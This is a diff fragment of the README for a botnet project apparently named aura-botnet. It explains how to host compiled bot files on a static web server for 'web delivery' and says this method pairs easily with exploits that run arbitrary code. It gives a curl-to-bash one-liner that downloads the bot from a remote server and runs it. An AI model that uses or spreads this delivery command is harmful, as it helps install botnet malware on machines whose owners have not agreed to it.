watersalesman/aura-botnet/README.md

 ---
 The *static* folder can be used to store files to be served by a web server -- preferably an nginx server running on a different port or host as your Django server.
-You will need to edit the index files, compile, and place the files into the folders.
-The simplicity of executing a web delivery makes it easy to integrate with exploits that run arbitrary code.
+You will need to compile and place the files into the folders, and edit the index files to reflect any changes like the server name.
+The simplicity of executing via web delivery makes it easy to integrate with exploits that run arbitrary code.
 An example in bash would be:

 ```
 curl http://static-server-name/welcome/linux/rust | bash